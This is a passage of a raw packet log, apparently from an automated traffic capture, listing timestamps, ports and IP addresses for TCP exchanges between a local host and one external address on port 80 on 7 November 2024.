Nov 7, 2024 04:12:27.705157995 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705158949 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.705169916 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705169916 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.705180883 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705193996 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.705213070 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705224037 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.705226898 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705239058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705251932 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705264091 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705276012 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.705301046 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705312014 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705319881 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.705322981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705336094 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.705363989 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.705672026 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705720901 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.705763102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705774069 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705785990 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705796957 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705801964 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.705807924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705817938 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705821037 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.705828905 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705841064 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705847025 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.705867052 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.705873966 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705883980 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705893993 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705897093 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.705904961 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705909014 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.705915928 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705928087 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.705929041 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.705938101 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.705966949 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.706011057 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706022978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706032991 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706051111 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.706052065 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706063986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706073046 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.706096888 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706105947 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.706109047 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706120968 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706130981 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.706152916 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706159115 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.706163883 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706176043 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706187963 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706190109 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.706201077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706218958 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.706242085 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.706278086 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706288099 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706299067 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706305981 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.706309080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706329107 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706332922 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.706340075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706351042 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706363916 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.706384897 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.706469059 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706478119 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.706501961 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.706530094 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.743899107 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.743920088 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.743933916 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.743944883 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.743943930 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.743957043 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.743968010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.743978024 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.743980885 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.743993044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744004011 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744009018 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744014978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744025946 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744029045 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744036913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744041920 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744057894 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744069099 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744071960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744081020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744091988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744092941 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744105101 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744117022 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744124889 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744128942 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744141102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744149923 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744153023 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744164944 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744168043 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744179010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744187117 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744190931 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744204044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744214058 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744215965 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744226933 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744230986 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744255066 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744282007 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744311094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744322062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744333029 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744345903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744353056 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744358063 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744369030 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744376898 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744379997 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744391918 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744401932 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744406939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744438887 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744446039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744458914 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744466066 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744471073 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744482040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744487047 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744493961 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744505882 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744510889 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744517088 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744530916 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744538069 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744550943 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744570017 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744698048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744777918 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744904995 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744918108 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744929075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744937897 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744940996 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744951963 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744952917 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744963884 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744967937 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744976044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744982958 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.744987965 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.744997978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745007992 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745012045 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745019913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745032072 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745032072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745053053 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745054960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745064974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745075941 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745081902 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745088100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745099068 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745101929 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745110989 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745124102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745131969 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745136023 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745147943 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745155096 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745158911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745166063 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745170116 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745188951 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745188951 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745202065 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745210886 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745213032 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745223999 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745233059 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745235920 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745248079 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745249987 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745259047 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745270967 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745275974 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745282888 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745294094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745302916 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745306015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745316982 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745325089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745336056 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745349884 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745352030 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745362043 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745368958 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745381117 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745392084 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745393991 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745404959 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745412111 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745417118 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745429039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745439053 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745443106 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745455980 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745461941 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745470047 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745481968 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745486975 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745492935 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745506048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745507002 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745528936 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745547056 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745621920 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745635033 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745646954 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745655060 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745660067 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745672941 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745680094 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745685101 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745687008 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745701075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745707989 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745712042 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745723963 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745728970 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745735884 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745747089 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745755911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745768070 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745771885 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745779037 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745786905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745791912 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745803118 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745815992 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745820045 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745842934 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745848894 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.745958090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745969057 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745978117 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745987892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.745996952 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746012926 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746027946 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746037960 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746047020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746056080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746066093 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746076107 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746085882 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746093988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746104002 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746123075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746133089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746140003 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746149063 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746157885 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746169090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746180058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746190071 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746200085 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746211052 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746221066 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746231079 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746241093 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746252060 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746262074 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746292114 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746325970 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746426105 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746436119 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746445894 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746455908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746465921 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746468067 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746490002 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746495962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746505976 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746511936 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746515989 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746526003 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746531010 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746567011 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746576071 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746599913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746611118 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746620893 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746630907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746639967 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746640921 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746648073 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746651888 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746660948 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746669054 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746670961 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746681929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746692896 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746711016 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746733904 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746870995 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746881962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746897936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746905088 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746907949 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746917009 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746918917 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746927977 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746937990 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746941090 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746946096 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746956110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746965885 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746965885 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746982098 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.746985912 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746992111 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.746993065 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747005939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747018099 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747025967 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747046947 CET	49762	80	192.168.2.4	185.215.113.16
